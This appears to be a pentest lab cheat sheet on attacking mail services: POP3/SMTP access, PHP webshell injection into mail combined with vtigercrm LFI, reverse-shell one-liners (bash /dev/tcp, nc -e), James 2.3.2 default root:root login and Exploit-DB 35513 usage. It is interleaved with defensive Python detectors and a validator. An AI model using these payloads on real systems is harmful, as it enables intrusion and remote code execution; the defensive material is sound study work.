Email SMTP
Read emails (POP3, port 110)
telnet 10.x.x.x 110
nc -nv 10.x.x.x 110
USER mindy
PASS hello
STAT
RETR 2
+OK Message follows
Delivered-To: mindy@localhost
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,
Here is your password.. blah blah blah
Send email with telnet
SMTP: 25
Bonus: inject a PHP payload into the mail body.. you will still need an LFI to read/execute it (see the LFI section below)
REF: PBX-PhpEmailExploit
telnet $IP 25
EHLO beep.htb ..Any hello will work
VRFY hacked@localhost ..rejected
VRFY asterisk@localhost ..Verified
mail from:[email protected]
rcpt to:asterisk@localhost ..Same as Verified
data ..Begin Email
Subject:Testing!
Hello ..test #1
<?php echo "Php success"; ?> ..test #2
<?php echo system($_REQUEST['command']); ?> ..test #3
. ..to end the email
quit
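Added example (not from these notes): the trick above only works because a mail spool will happily store `<?php ... ?>` and an LFI later includes the spool as PHP. A defender can scan mbox-format spools for PHP open tags, which a mailbox never legitimately needs. The sample spool below is constructed (the second message reuses the body from the session above); the function and regex names are this example's own.

```python
"""Scan an mbox-format mail spool for embedded PHP (added example)."""
import re
import email
from email import policy

# PHP open tags ("<?php", "<?=") and the execution sinks the payload above relies on.
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
SINK_RE = re.compile(r"\b(system|exec|shell_exec|passthru|popen|eval)\s*\(", re.IGNORECASE)

# Constructed sample spool: one benign admin mail, then the injected message.
SAMPLE_SPOOL = """\
From mailadmin@localhost Tue Aug 22 13:17:28 2017
Delivered-To: mindy@localhost
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,
Here is your password.. blah blah blah

From attacker@example.invalid Tue Aug 22 14:02:10 2017
From: attacker@example.invalid
To: asterisk@localhost
Subject: Testing!

Hello
<?php echo "Php success"; ?>
<?php echo system($_REQUEST['command']); ?>
"""


def split_mbox(text):
    """Split raw mbox text into messages on the 'From ' envelope lines.
    MDAs escape body lines that begin with 'From ' as '>From ', so a plain
    prefix test is enough for a well-formed spool."""
    messages, current = [], []
    for line in text.splitlines():
        if line.startswith("From "):
            if any(current):
                messages.append("\n".join(current))
            current = []
            continue
        current.append(line)
    if any(current):
        messages.append("\n".join(current))
    return messages


def scan_spool(text):
    """Return one finding per message whose text parts contain a PHP open tag."""
    findings = []
    for raw in split_mbox(text):
        msg = email.message_from_string(raw, policy=policy.default)
        body = "\n".join(part.get_content() for part in msg.walk()
                         if part.get_content_maintype() == "text")
        tags = len(PHP_TAG_RE.findall(body))
        if not tags:
            continue
        sinks = sorted({m.lower() for m in SINK_RE.findall(body)})
        findings.append({"from": str(msg["From"]), "subject": str(msg["Subject"]),
                         "php_tags": tags, "sinks": sinks})
    return findings


if __name__ == "__main__":
    for f in scan_spool(SAMPLE_SPOOL):
        print(f"PHP in mail from {f['from']} ({f['subject']!r}): "
              f"{f['php_tags']} open tag(s), sinks={f['sinks']}")
```

Point it at a real spool with `scan_spool(open('/var/mail/asterisk').read())`; any hit is worth alerting on, and a hit that also names a sink such as `system` is an active webshell waiting for an include.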
sendEmail with the PHP file as the message body (the sendEmail tool, not the sendmail MTA binary)
Instead of telnet, EHLO, blah blah...
Send a reverse shell PHP
> sendEmail -t asterisk@localhost -o message-file=php-reverse-shell.php -u pwnd -s $IP:25 -f [email protected]
execute (via the LFI below) and catch the connection
LFI Execution Example (for after you've sent the evil email)
> nc -nvlp 4444
> https://$IP/vtigercrm/graph.php?current_language=../../../../../../../../var/spool/mail/asterisk%00&module=Accounts&action
.. graph.php?lang=../../../var/mail/asterisk%00&module=Accounts&command=whoami HTTP/1.1
.. graph.php?lang=../../../var/mail/asterisk%00&module=Accounts&command=bash -i >& /dev/tcp/$IP/4444 0>&1 HTTP/1.1
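Added example (not from these notes): the requests above leave a very recognisable shape in the web server access log, so here is the matching detection over constructed Apache-style lines. The URL shapes are the ones from the notes (one line is double URL-encoded to show why the decoder runs twice); client addresses, timestamps and function names are this example's own.

```python
"""Flag mail-spool LFI attempts in an Apache-style access log (added example)."""
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed sample log lines.
SAMPLE_LOG = [
    '10.10.14.5 - - [22/Aug/2017:13:20:01 -0400] "GET /vtigercrm/graph.php?current_language=en_us&module=Accounts&action=index HTTP/1.1" 200 512',
    '10.10.14.5 - - [22/Aug/2017:13:21:44 -0400] "GET /vtigercrm/graph.php?current_language=../../../../../../../../var/spool/mail/asterisk%00&module=Accounts&action HTTP/1.1" 200 1887',
    '10.10.14.5 - - [22/Aug/2017:13:22:10 -0400] "GET /vtigercrm/graph.php?lang=..%252F..%252F..%252Fvar%252Fmail%252Fasterisk%2500&module=Accounts&command=whoami HTTP/1.1" 200 1903',
    '10.10.14.9 - - [22/Aug/2017:13:25:00 -0400] "GET /index.php?page=home HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
SPOOL_RE = re.compile(r"/var/(?:spool/)?mail/")


def decode_param(raw):
    """parse_qsl already removed one layer of %-encoding; a second pass
    catches double-encoded traversal like ..%252F."""
    return unquote(raw)


def analyse_target(target):
    """Return the reasons a request target looks like a mail-spool LFI attempt."""
    reasons = []
    for key, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = decode_param(raw)
        if "../" in value or "..\\" in value:
            reasons.append(f"{key}: directory traversal")
        if "\x00" in value:
            reasons.append(f"{key}: null byte (extension truncation)")
        if SPOOL_RE.search(value):
            reasons.append(f"{key}: mail spool path")
    return reasons


def scan_access_log(lines):
    """Return one hit per log line whose request target triggers any reason."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        reasons = analyse_target(m.group("target"))
        if reasons:
            hits.append({"client": line.split(" ", 1)[0],
                         "target": m.group("target"), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for h in scan_access_log(SAMPLE_LOG):
        print(h["client"], h["target"])
        for reason in h["reasons"]:
            print("   -", reason)
```

Any one reason alone is noisy (a null byte in a parameter is rare but traversal strings show up in scanners all day); the combination of traversal plus a mail spool path on a PHP include parameter is the thing to page on, and the `command=` parameter on the same request tells you the include already succeeded once.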
Goal: the mail files on disk
cat /var/mail/asterisk
Thunderbird
If you have a user/pass, you can open Thunderbird to browse emails
You might find a password that you could use for SSH too!! REF: solidstateHTB
thunderbird
create new account: email
mindy@10.x.x.x
password
read emails
James Server 2.3.2
Java Apache Mail Enterprise Server (JAMES)
Open source SMTP and POP3 mail transfer agent and NNTP news server
Default Login: root:root
Connect to the admin tool and reset a user's email password
Then use Thunderbird email to look for clues
nmap -p- 10.x.x.x
PORT STATE SERVICE
25/tcp open smtp ..mail server will be present too
110/tcp open pop3 ..mail component
119/tcp open nntp ..not sure this is related
4555/tcp open rsip ..JAMES connect port for admin tool!!
nc $IP 4555 ..telnet works too
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
admin:admin ..fail
root:root ..ok
help
listusers
setpassword admin password
setpassword mindy password ..will update a user's email password
James Server Exploit 2.3.2 (RCE)
Exploit-DB 35513 will get you a full shell
Requirements:
Default login: root/root
Must have a working ssh login user/pass (limited is ok)
Need to update the payload for reverse-connect
Will add a weird user account: ../../../etc/bash_completion.d
Sends email to our 'weird' user-directory
When anybody logs into ssh, we will get execution
Confused?
Yes, you need an SSH login already.. but if it's limited it won't do much on its own
This exploit gets you a full shell instead of a limited one
Next step is to look for PrivEsc !!
searchsploit james
searchsploit -m linux/remote/35513.py
vim 35513.py
payload = 'bash -i >& /dev/tcp/$MyIP/4444 0>&1'
payload = 'nc -e /bin/bash $MyIP 4444 &' ..optional
python 35513.py $IP
python2.7 ./35513.py 10.x.x.x
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.
ssh user@server ..will pop the exploit
nc -nvlp 4444 ..listen (start the listener before the SSH login that triggers the payload)
connected ..with full shell
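Added example (not from these notes and not James code): the whole 35513 chain hinges on the admin tool accepting `../../../etc/bash_completion.d` as a username, so that the user's mail repository is created outside the spool root. Below is the check a mail server's user repository should apply, shown next to the naive "anything non-empty" check that lets the name through. The spool root `/var/mail`, the allow-list regex and the function names are this example's assumptions; the resolution is purely lexical so it runs anywhere.

```python
"""Username validation that blocks path-traversal mailbox names (added example)."""
import os
import re

# Hypothetical spool root. James 2.3.2 keeps mailboxes under its own
# repository directory; the exact path is not the point here.
MAILBOX_ROOT = "/var/mail"

# Allow-list: lowercase local-part, must start with a letter, no separators.
SAFE_USERNAME_RE = re.compile(r"[a-z][a-z0-9._-]{0,31}")


def naive_accepts(username):
    """The kind of check that lets the 35513 trick through: any non-empty name goes."""
    return bool(username.strip())


def resolve_mailbox_path(username, root=MAILBOX_ROOT):
    """Where a mailbox named `username` would land under `root`, resolved lexically."""
    return os.path.normpath(os.path.join(root, username))


def is_contained(path, root=MAILBOX_ROOT):
    """True only if `path` is at or below `root` after normalisation."""
    root = os.path.normpath(root)
    return os.path.commonpath([root, os.path.normpath(path)]) == root


def validate_username(username, root=MAILBOX_ROOT):
    """Return the mailbox path for an acceptable username, else raise ValueError.

    Two independent layers: an allow-list on the name, and a containment check
    on the resolved path, so that loosening the regex later cannot reopen the hole.
    """
    if not SAFE_USERNAME_RE.fullmatch(username):
        raise ValueError(f"rejected username {username!r}: not in allow-list")
    path = resolve_mailbox_path(username, root)
    if not is_contained(path, root):
        raise ValueError(f"rejected username {username!r}: escapes {root}")
    return path


def check(username):
    """(accepted, path_or_reason) pair, convenient for reporting."""
    try:
        return True, validate_username(username)
    except ValueError as exc:
        return False, str(exc)


if __name__ == "__main__":
    for name in ["mindy", "../../../etc/bash_completion.d", "mindy/../../root"]:
        print(f"{name!r:40} naive={naive_accepts(name)!s:5} "
              f"lands at {resolve_mailbox_path(name)}")
        print("    strict:", check(name))
```

The containment check is what matters operationally: even a repository that stores users in a database should refuse any name whose resolved on-disk path leaves the spool root, because `bash_completion.d` is sourced by every interactive bash login and a file dropped there runs as whoever logs in next, which is exactly the behaviour the exploit counts on.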